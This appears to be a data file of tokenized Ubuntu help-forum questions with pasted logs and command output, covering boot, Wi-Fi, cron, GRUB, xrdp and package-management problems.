19:27:45.203612 ip 192.168.0.69.37076 > 192.168.0.1.domain : 43428+ ptr ? 1.0.168.192.in-addr.arpa . ( 42 ) 19:27:45.391250 arp , request who-has 192.168.0.69 tell 192.168.0.1 , length 46 19:27:45.391327 arp , reply 192.168.0.69 is-at 00:90:4b : a2:4d:89 ( oui unknown ) , length 28 19:27:45.405816 ip 192.168.0.1.domain > 192.168.0.69.2663 : 7253 1/0/0 a 209.239.120.202 ( 50 ) 19:27:45.406365 arp , request who-has static-ip-209-239-120-202.inaddr.ip-pool.com tell 192.168.0.69 , length 28 19:27:45.560263 arp , reply 192.168.0.60 is-at 00 : f4:28:00:29 : a7 ( oui unknown ) , length 46 19:27:46.403509 arp , request who-has static-ip-209-239-120-202.inaddr.ip-pool.com tell 192.168.0.69 , length 28 19:27:46.563522 arp , reply 192.168.0.60 is-at 00 : f4:28:00:29 : a7 ( oui unknown ) , length 46 11 packets captured 24 packets received by filter 0 packets dropped by kernel please i need some more ideas in order to troubleshoot what is going on . its not a single host trouble , it happens with many others i just used ubica.com.sv as an example . thanks
518992	broken ubuntu distibution	i am running ubuntu 14.04 as my main distro . recently i installed several additional desktop environments , including : cairo , cinnamon , pantheon , deepin , and most recently xubuntu . i always had trouble booting into pantheon and deepin so i wanted to uninstall them . so , for deepin i went to the file in my sources file and deleted to lines i had added , and subsquently went into synaptic and deleted everything with `` deepin '' in its name . then for pantheon i did ( i think ) : sudo apt-get purge pantheon upon rebooting into ubuntu itself , i saw a blank blue home page , but no unity interface at all , i could do nothing but press and hold the power button and restart . how can i make ubuntu boot again ?
518993	who runs scripts inside /etc/cron.hourly if anacron is enabled ?	i 've read that if anacron is enabled cron does n't run the scripts inside cron.weekly/hourly/daily/hourly , as not to run them twice . so anacron takes responsability on that folders . however anacron does n't work with hourly scripts . so , who runs /etc/cron.hourly ? sorry if it is a begginer question .
518994	hadoop 2.5.0 default xml references dot-notation environment variables	reviewing the hadoop default.xml files , they refer to many environment vars such as $ { hadoop.log.dir } which will not parse ( dots are interpreted as separators ) in the ubuntu 14.04.1 shell ; are these anything that we need to be concerned of , are they taken care of by some other means ? the default.xml files are more complex than on the 1.2.x hadoop , for which there is more reference materials . though 2.5.x is the most recent stable , so i went with it ...
518997	how do i re-run boot loader ?	running sudo apt-get -f install said that the link /vmlinuz.old is a damaged link and : you may need to re-run your boot loader [ grub ] here 's the full output : user @ chrubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.13.0-32 linux-headers-3.13.0-32-generic linux-image-3.13.0-32-generic linux-image-extra-3.13.0-32-generic use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . user @ chrubuntu : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-headers-3.13.0-32 linux-headers-3.13.0-32-generic linux-image-3.13.0-32-generic linux-image-extra-3.13.0-32-generic 0 upgraded , 0 newly installed , 4 to remove and 0 not upgraded . after this operation , 270 mb disk space will be freed . do you want to continue ? [ y/n ] y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en en '' , lc_all = ( unset ) , lc_time = `` en '' , lc_monetary = `` en '' , lc_address = `` en '' , lc_telephone = `` en '' , lc_name = `` en '' , lc_measurement = `` en '' , lc_identification = `` en '' , lc_numeric = `` en '' , lc_paper = `` en '' , lang = ( unset ) are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_all to default locale : no such file or directory ( reading database ... 232120 files and directories currently installed . ) removing linux-headers-3.13.0-32-generic ( 3.13.0-32.57 ) ... removing linux-headers-3.13.0-32 ( 3.13.0-32.57 ) ... removing linux-image-extra-3.13.0-32-generic ( 3.13.0-32.57 ) ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic update-initramfs : deleting /boot/initrd.img-3.13.0-32-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic the link /initrd.img.old is a damaged link removing symbolic link initrd.img.old you may need to re-run your boot loader [ grub ] removing linux-image-3.13.0-32-generic ( 3.13.0-32.57 ) ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic update-initramfs : deleting /boot/initrd.img-3.13.0-32-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic the link /vmlinuz.old is a damaged link removing symbolic link vmlinuz.old you may need to re-run your boot loader [ grub ] user @ chrubuntu : ~ $ how do i re-run the boot loader ?
519001	not able to login into ubuntu 12.04	i am now using ubuntu 12.04 . i have problem with login . it wait me for log time even though i have enter right password.and nothing happen after waiting . i try to login from guest account but same problem occur with guest account .
519002	remmina and vinagre alternatives for vnc with ssh-tunnel support	i 'm using remmina for connect to other computers using vnc . but it 's often buggy when i choose ssh-tunnel . vinagre works better , but it 's not able to manage bookmarks . are there ways to solve problems with remmina and vinagre ? or are there better alternatives of this software ?
519003	how do i run lubuntu from my existing ubuntu 14.04 ?	i entered sudo apt-get install lubuntu-desktop on a terminal , and everything was downloaded properly . the thing is , i do not know how to run lubuntu from my ubuntu os . i am quite a begginer . regards .
519004	can i use tlp and cpufreq at the same time ?	i just started using ubuntu 14.04 recently . i read that it 's good to have cpufreq or tlp . i was wondering if it would be okay to have both . would it cause any problems with the computer performance if i have both running ?
519005	in the process of installing java and hadoop , my user profile has disappeared ?	edit : : : so when i do edit profile code , it 's a different profile . the original one is indeed intact ; at least i can open it from the text editor . but how can i reopen the original ( proper ) profile ? every time i try sudo gedit etc/profile it brings up a new , blank profile . did i add those java/hadoop paths to the right profile in the first place ? must it be a certain profile within a certain directory ( and is the directory when i enter the above line of code the determinant of the sole location where the profile exists/applies ? ) so beginner , my apologies . so i added the following code to the bottom of profile after : sudo gedit etc/profile code added to profile : java_home=/usr/local/java/jdk1.8.0_20 path= $ path : $ java_home/bin jre_home=/usr/local/java/jre1.8.0_20 path= $ path : $ jre_home/bin hadoop_install=/home/ { user_name } /hadoop/hadoop-1.2.1 path= $ path : $ hadoop_install/bin export java_home export jre_home export path ok - so no problem . i saved , closed , and went back to terminal and did n't think i did anything that would somehow delete the whole profile . but , that 's what seems to have happened ? ? now when i do gedit etc/profile code , the whole thing is completely blank ? sorry if i 'm just not looking in the right place and this is a stupid question .
519008	boost libraries compilation fails	i am trying to install boost libraries 1.49.0 on a machine running ubuntu server 14.04 . the compilation of boost fails with the following errors . ... failed gcc.compile.c++ bin.v2/libs/locale/build/gcc-4.8/release/link-static/threading-multi/icu/formatter.o ... ... skipped < pbin.v2/libs/locale/build/gcc-4.8/release/link-static/threading-multi > libboost_locale.a ( clean ) for lack of < pbin.v2/libs/locale/build/gcc-4.8/release/link-static/threading-multi > icu/formatter.o ... ... skipped < pbin.v2/libs/locale/build/gcc-4.8/release/link-static/threading-multi > libboost_locale.a for lack of < pbin.v2/libs/locale/build/gcc-4.8/release/link-static/threading-multi > icu/formatter.o ... ... skipped < p/usr/local/lib > libboost_locale.a for lack of < pbin.v2/libs/locale/build/gcc-4.8/release/link-static/threading-multi > libboost_locale.a ... ... failed updating 2 targets ... ... skipped 6 targets ... boost 1.49 is a requirement . need help .
519009	can not detect nividia gpu after switching to igpu	i have nvidia gpu installed in my system with ubuntu 12.04 . it has been acting as display driver for my monitor but i also used it ( happily so far ) for cuda-based scientific computing . since the motherboard ( asus ) has an integrated gpu , i figured i should use that instead for my monitor to free up resources in the gpu card ( and the display becomes laggy during heavy math stuff ) . so in bios i changed the setting from auto to igpu . but after i boot into ubuntu , now it acts like the gpu card is not there . nvidia-smi unable to locate package nvidia-smi the nvidia x-server settings application is not in my list of applications either . but everything 's back to as previously if i change the setting back to auto and reboot , nvidia-smi reports the driver details and nvidia x-server settings application reappears in the applications list . that 's pretty clever really , but how can i use my igpu for monitor and not gpu card but still get the card detected ? in windows , both igpu and gpu card could be detected , because under screen resolution i could select between display 1 and 2 .
519010	ubuntu 14.04 and wifi 6230	i 've got a intel nuc 54250wykh with a intel 6230 mini pci-express card and i 've installed xubuntu 14.04 64bit . i 'm having trouble getting the wireless to connect to a known working access point ( i 've tried two known working access points with no luck ) the device is showing $ sudo lshw -c network *-network description : wireless interface product : centrino advanced-n 6230 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan1 version : 34 serial : 88:53:2e:82 : bd : e2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.17.0-031700rc3-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:46 memory : f7c00000-f7c01fff $ iwconfig wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry short limit:7 rts thr : off fragment thr : off power management : off $ lspci -nnk | grep -ia2 net 00:19.0 ethernet controller [ 0200 ] : intel corporation ethernet connection i218-v [ 8086:1559 ] ( rev 04 ) subsystem : intel corporation device [ 8086:2054 ] kernel driver in use : e1000e -- 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6230 [ rainbow peak ] [ 8086:0090 ] ( rev 34 ) subsystem : intel corporation centrino advanced-n 6230 agn [ 8086:5211 ] kernel driver in use : iwlwifi $ dmesg | grep iwl [ 2.956149 ] iwlwifi 0000:02:00.0 : ca n't disable aspm ; os does n't have aspm control [ 2.956207 ] iwlwifi 0000:02:00.0 : irq 46 for msi/msi-x [ 2.960740 ] iwlwifi 0000:02:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm [ 3.006196 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debug disabled [ 3.006198 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debugfs enabled [ 3.006199 ] iwlwifi 0000:02:00.0 : config_iwlwifi_device_tracing enabled [ 3.006201 ] iwlwifi 0000:02:00.0 : detected intel ( r ) centrino ( r ) advanced-n 6230 agn , rev=0xb0 [ 3.006250 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 3.040627 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 3.185390 ] iwlwifi 0000:02:00.0 wlan1 : renamed from wlan0 [ 3.719199 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 3.725691 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 [ 3.998184 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 4.004682 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 [ 5393.040112 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 5393.046611 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 [ 5618.225517 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 5618.232007 ] iwlwifi 0000:02:00.0 : radio type=0x1-0x2-0x0 i can see one or two networks in the network manager , when i try and connect i get the error ; *** /var/log/syslog *** sep 2 22:04:01 joe networkmanager [ 810 ] : get_secret_flags : assertion 'is_secret_prop ( setting , secret_name , error ) ' failed sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) scheduled ... sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) started ... sep 2 22:04:01 joe networkmanager [ 810 ] : < info > ( wlan1 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) scheduled ... sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) complete . sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) starting ... sep 2 22:04:01 joe networkmanager [ 810 ] : < info > ( wlan1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1/wireless ) : connection 'mick 1 ' has security , and secrets exist . no new secrets needed . sep 2 22:04:01 joe networkmanager [ 810 ] : < info > config : added 'ssid' value 'mick' sep 2 22:04:01 joe networkmanager [ 810 ] : < info > config : added 'scan_ssid ' value '1' sep 2 22:04:01 joe networkmanager [ 810 ] : < info > config : added 'key_mgmt' value 'wpa-psk' sep 2 22:04:01 joe networkmanager [ 810 ] : < info > config : added 'auth_alg' value 'open' sep 2 22:04:01 joe networkmanager [ 810 ] : < info > config : added 'psk' value ' < omitted > ' sep 2 22:04:01 joe networkmanager [ 810 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) complete . sep 2 22:04:01 joe networkmanager [ 810 ] : < info > config : set interface ap_scan to 1 sep 2 22:04:01 joe networkmanager [ 810 ] : < info > ( wlan1 ) : supplicant interface state : inactive - > scanning sep 2 22:04:10 joe wpa_supplicant [ 1011 ] : message repeated 4 times : [ wlan1 : ctrl-event-scan-started ] sep 2 22:04:13 joe wpa_supplicant [ 1011 ] : wlan1 : sme : trying to authenticate with 02:1a:11 : f0:42 : af ( ssid='mick ' freq=2437 mhz ) sep 2 22:04:13 joe kernel : [ 78.260201 ] wlan1 : authenticate with 02:1a:11 : f0:42 : af sep 2 22:04:13 joe kernel : [ 78.265224 ] wlan1 : direct probe to 02:1a:11 : f0:42 : af ( try 1/3 ) sep 2 22:04:13 joe networkmanager [ 810 ] : < info > ( wlan1 ) : supplicant interface state : scanning - > authenticating sep 2 22:04:13 joe kernel : [ 78.465453 ] wlan1 : direct probe to 02:1a:11 : f0:42 : af ( try 2/3 ) sep 2 22:04:13 joe kernel : [ 78.669376 ] wlan1 : direct probe to 02:1a:11 : f0:42 : af ( try 3/3 ) sep 2 22:04:13 joe kernel : [ 78.873309 ] wlan1 : authentication with 02:1a:11 : f0:42 : af timed out sep 2 22:04:13 joe networkmanager [ 810 ] : < info > ( wlan1 ) : supplicant interface state : authenticating - > disconnected *** /var/log/kern.log *** sep 2 22:04:13 joe kernel : [ 78.260201 ] wlan1 : authenticate with 02:1a:11 : f0:42 : af sep 2 22:04:13 joe kernel : [ 78.265224 ] wlan1 : direct probe to 02:1a:11 : f0:42 : af ( try 1/3 ) sep 2 22:04:13 joe kernel : [ 78.465453 ] wlan1 : direct probe to 02:1a:11 : f0:42 : af ( try 2/3 ) sep 2 22:04:13 joe kernel : [ 78.669376 ] wlan1 : direct probe to 02:1a:11 : f0:42 : af ( try 3/3 ) sep 2 22:04:13 joe kernel : [ 78.873309 ] wlan1 : authentication with 02:1a:11 : f0:42 : af timed out *** /var/log/syslog *** sep 2 22:04:13 joe wpa_supplicant [ 1011 ] : wlan1 : ctrl-event-scan-started sep 2 22:04:13 joe networkmanager [ 810 ] : < info > ( wlan1 ) : supplicant interface state : disconnected - > scanning sep 2 22:04:26 joe networkmanager [ 810 ] : < warn > activation ( wlan1/wireless ) : association took too long , failing activation . sep 2 22:04:26 joe networkmanager [ 810 ] : < info > ( wlan1 ) : device state change : config - > failed ( reason 'ssid not found ' ) [ 50 120 53 ] sep 2 22:04:26 joe networkmanager [ 810 ] : < warn > activation ( wlan1 ) failed for connection 'mick 1' sep 2 22:04:26 joe networkmanager [ 810 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . sep 2 22:04:26 joe networkmanager [ 810 ] : < info > ( wlan1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] sep 2 22:04:26 joe networkmanager [ 810 ] : < info > ( wlan1 ) : deactivating device ( reason 'none ' ) [ 0 ] sep 2 22:04:26 joe networkmanager [ 810 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . sep 2 22:04:26 joe wpa_supplicant [ 1011 ] : message repeated 2 times : [ wlan1 : ctrl-event-scan-started ] sep 2 22:04:29 joe wpa_supplicant [ 1011 ] : wlan1 : reject scan trigger since one is already pending sep 2 22:04:30 joe networkmanager [ 810 ] : < info > ( wlan1 ) : supplicant interface state : scanning - > inactive sep 2 22:04:52 joe wpa_supplicant [ 1011 ] : wlan1 : ctrl-event-scan-started i have double checked the password . i 've tried the latest kernel without any luck . most of the time i can not see any access points in the network manager . $ iwlist wlan0 scanning wlan0 no scan results there are access points within range though .
519012	jboss server running but localhost is not running ?	i am not able to install jboss server 6.1.0 on ubuntu . i had downloaded the jboss 6.1.0 package and tried to install the terminal but unable to do so .
519018	strange wlan0 issues	i 've recently been having some strange problems with my wireless internet since i updated lubuntu . mainly i can not connect to any wireless connections , and connection properties tells me that wlan0 is disconnected . though it says it 's disconnected , i can still scan and pick up wifi connections , and even attempt to connect , but when i put in my password it does nothing . i was told by someone else that had similar issues to run : ifconfig wlan0 down dhclient -r wlan0 ifconfig wlan0 up dhclient wlan0 but when i did that , first ifconfig up apparently did nothing , and then dhclient wlan0 stalled before giving me no dhcpoffers received . unable to obtain a lease another note is that my wifi worked for two days after updating , and just suddenly stopped . i know its not my router , because other devices can connect with no issue .
519019	ubuntu 14.04 elantech touchpad too sensitive	i am using samsung series 3 laptop . i recently shifted from windows 8 to ( my touch works just fine on windows 8 ) .after writing 2-3 words the focus shifts to where the cursor lies . i tried some resolutions suggested on the web but could not resolve the problem . ( i want to fix it without buying an external mouse , which is of course a solution ) . the touchpad is etps/2 elantech as detected in terminal by xinput . right now synaptic finger is set to 1 1 0 . i tried changing it to 50 90 255 as suggested somewhere on web but it freezes the mouse in that case .
519021	understanding rm command	i 've been using ubuntu server at home for a while now , and i 've noticed i 've some holes in my knowledge of bash and in general several dangerous tools like rm . it is first time in my life i used rm to delete something i did n't intend to ... pwd : /media/storage/vod ls : css html series music movies sudo rm *.qtfs sudo rm -rf *.qtfs what is the difference between these two above ? i 've filename specified . so will recursion look within all sub directories for *.qtfs or just inside current dir ( vod ) ? i imagine later ... so in this case recursion flag does n't do anything , correct ? sudo rm -r *.qtfs series/* this was my undoing command . anyhow , so in this case i just gave rm two separate delete commands , correct ? first delete recursively *.qtfs , but this part only looks inside current dir ( vod ) . second deletes recursively contents of series directory . in essence i 'm trying to understand if i deleted something beyond obvious damage .
519024	how can i adjust screen brightness on toshiba c665-x5010 ?	i am using toshiba c665-x5010 laptop having nvidia geforce 315m gpu . i have installed ubuntu 14.04 recently and i could n't adjust my screen brightness . please help me .
519025	uninstall os running in dual boot	supposing i have two linux distributions , in dual boot ( the grub menu appears and ask me what to choose ) : ubuntu 14.04 elementary os adding a new one is very simple : just insert the installation device and start installing . what about uninstalling one ? how can i uninstall elementary os , for example ? can i do that only by formatting/deleting that partition ?
519031	trouble with the cache	i am using a ubuntu 12.04 lts 32-bit the little red ball on my toolbar says : 'error : opening the cache ' ( e : encountered a section with no package ; header , e. problem with margelist/var/lib/apt/lists ... .. i researched this and found an answer , see below . i ran the answer and the results are also below . i ran one of command lines and the list of things to do is gigantic . can someone guide me through this ? live free or die ! ! ! luninuxos.sf.netpeter @ peter-k84l : ~ $ peter @ peter-k84l : ~ $ peter @ peter-k84l : ~ $ sudo dpkg -- configure -a sudo apt-get -f install sudo apt-get -- fix-missing install sudo apt-get clean sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade sudo apt-get clean sudo apt-get autoremove [ sudo ] password for peter : dpkg : error : -- configure -- pending does not take any non-option arguments type dpkg -- help for help about installing and deinstalling packages [ * ] ; use dselect ' oraptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ ] produce a lot of output - pipe it through less ' ormore ' ! peter @ peter-k84l : ~ $ uîż 12.04.4 0 :
519032	the shortcut keys for switching keyboard layout randomly stop working	alt-shift switches between hebrew/english keyboard layouts . every few hours , this stops working . the layout-switching icon in the panel continues to work . if i go back to settings- > keyboard , and again configure the keyboard shortcut , it starts working again . the same thing happens if i choose caps lock , alt caps lock or some other key for layout-switching . how can prevent this problem ?
519034	problem booting windows 8.1 with ubuntu 14.04	i have recently installed ubuntu 14.04 on one one partition and windows 8.1 on other . but when i try to boot windows sometimes it starts but most of the time screen freezes ( in pic 2 ) and nothing happens . i have to hard reboot my laptop . images are below :
519036	what to do after ubuntu remounts my filesystem in read/write mode ?	warning : total noob . so , i tried to upgrade my version of ubuntu , as prompted , but i accidentally restarted too early and everything just went horribly . ubuntu will load to my login screen fine , but when i attempt to log in a bunch of code flashes across the screen and i am brought back to the login screen . i tried using the root session and typing the command mount -o remount , rw / it then displays some information about mounting , but i 'm not sure if its relevant . the only thing it appears to do is make the graphics on my login screen all messed up . from the recovery mode menu , if i select the fail safe boot option or the fix errors boot option it displays : `` continuing will remount your/filesystem in read/write mode and mount any other filesystem defined in /etc/fstab . do you wish to continue ? '' i click yes and it says : fsck from util-linux 2.20.1 /dev/sda6 : clean , 682207/2375680 files , 3538696/9496320 blocks i have tried to type commands like mount -o remount , rw / . nothing ever works out though . i really have no idea what the next step is supposed to be ... how do i fix my computer ? sorry if i did n't provide the necessary info , i do n't really know what i even need to know . my system is a dual boot with windows 7 btw , that seems to be somewhat important .
519038	how to find resolution of tty i 'm using ?	i can get to a tty in ubuntu by pressing ctrl+alt+f1 . once i 'm at a shell in this tty , how can i find out what is the resolution of this tty ? note that the grub_gfxmode in my /etc/default/grub file is commented out . so , i can not find out the resolution from there .
519046	can not see windows xp os after re installing edubuntu 10.04 along side windows	help me please ! i tried to fix a problem by reinstalling edubuntu 10.04 from a live cd . i didnot partition manually . i selected `` along side another operating system . '' after restarting no grub loader boot menu . it simply get black after bios and ubuntu boots . where is my xp os ? can i correct it by a repair in booting ?
519047	audio device changes on reboot	i 'm using ubuntu with rise vision for digital signage at our company . its hooked up to a hdmi display with audio coming through the display . its been working great until the end of summer after some updates to ubuntu . now everytime i reboot ( which it does every evening ) it changes the default audio device to the one in the computer instead of the hdmi . it has never done this before . i 've tried to disable the onboard audio device , but it does n't help . it keeps selecting it on startup . i 've even tried to stop it from rebooting , yet every morning it seems the audio device has changed .
519048	how to set up a ftp server	how to set up a ftp server with file-zilla in ubuntu so that i can transfer files between my computer and mobile phone ?
519050	ubuntu 14.04 | xrdp with xfce crashes	im trying to make xrpd work on my ubuntu 14.04. after a lot failed-grey-screen attempts to make it work i finally succeed to see the desktop with this tutorial : http : //c-nergy.be/blog/ ? p=5305 now the problem is that after i click on a folder or a program it immediately crashes and i lose the connection . this is the xsession-errors log : xsession : x session started for at tue sep 2 09:52:40 idt 2014 x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 109 ( x_changehosts ) value in failed request : 0x5 serial number of failed request : 6 current serial number in output stream : 8 localuser : feld being added to access control list x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 109 ( x_changehosts ) value in failed request : 0x5 serial number of failed request : 6 current serial number in output stream : 8 script for ibus started at run_im . unable to create /home/feld/.dbus/session-bus script for ibus started at run_im . xlib : extension `` randr '' missing on display `` :15.0 '' . xfce4-session-message : ssh-agent is already running xlib : extension `` randr '' missing on display `` :15.0 '' . ( xfwm4:6318 ) : xfwm4-warning ** : the display does not support the xrender extension . ( xfwm4:6318 ) : xfwm4-warning ** : the display does not support the xrandr extension . ( xfwm4:6318 ) : xfwm4-warning ** : the display does not support the xcomposite extension . ( xfwm4:6318 ) : xfwm4-warning ** : the display does not support the xdamage extension . ( xfwm4:6318 ) : xfwm4-warning ** : the display does not support the xfixes extension . ( xfwm4:6318 ) : xfwm4-warning ** : compositing manager disabled . xlib : extension `` randr '' missing on display `` :15.0 '' . xlib : extension `` randr '' missing on display `` :15.0 '' . xlib : extension `` randr '' missing on display `` :15.0 '' . xlib : extension `` randr '' missing on display `` :15.0 '' . xlib : extension `` randr '' missing on display `` :15.0 '' . xlib : extension `` randr '' missing on display `` :15.0 '' . ** ( process:6391 ) : critical ** : bluez.vala:104 : gdbus.error : org.bluez.error.nosuchadapter : no such adapter failure : module initialization failed ** ( xfce4-volumed:6398 ) : warning ** : binding 'xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < alt > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < shift > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < shift > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < alt > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < alt > < shift > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < shift > < alt > xf86audioraisevolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding 'xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < alt > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < shift > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < shift > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < alt > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < alt > < shift > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < shift > < alt > xf86audiolowervolume ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding 'xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < alt > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < shift > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < shift > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < alt > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < alt > < shift > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : binding ' < ctrl > < shift > < alt > xf86audiomute ' failed ! ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers ** ( xfce4-volumed:6398 ) : warning ** : failed to map virtual modifiers xlib : extension `` randr '' missing on display `` :15.0 '' . ** ( polkit-gnome-authentication-agent-1:6413 ) : warning ** : unable to register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject can not register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject warning : import keyring failed ( xfsettingsd:6474 ) : xfsettingsd-critical ** : no randr extension found in display :15.0 . display settings wo n't be applied . xlib : extension `` xinputextension '' missing on display `` :15.0 '' . ( xfsettingsd:6474 ) : xfsettingsd-critical ** : xi is not present . ( xfsettingsd:6474 ) : xfsettingsd-critical ** : failed to initialize the xkb extension . ( xfsettingsd:6474 ) : xfsettingsd-critical ** : failed to initialize the accessibility extension . ( zeitgeist-datahub:6374 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( zeitgeist-datahub:6374 ) : glib-gobject-critical ** : g_signal_connect_data : assertion 'g_type_check_instance ( instance ) ' failed ** ( process:6409 ) : critical ** : volume_control_set_volume_internal : assertion '_tmp1_ == pa_context_ready ' failed back in time version : 1.0.34 back in time comes with absolutely no warranty . this is free software , and you are welcome to redistribute it under certain conditions ; type `backintime -- license ' for details . traceback ( most recent call last ) : file `` /usr/share/backintime/common/backintime.py '' , line 405 , in < module > start_app ( ) file `` /usr/share/backintime/common/backintime.py '' , line 296 , in start_app daemon = password.password_cache ( cfg ) file `` /usr/share/backintime/common/password.py '' , line 245 , in __init__ os.chmod ( pw_cache_path , 0700 ) oserror : [ errno 1 ] operation not permitted : 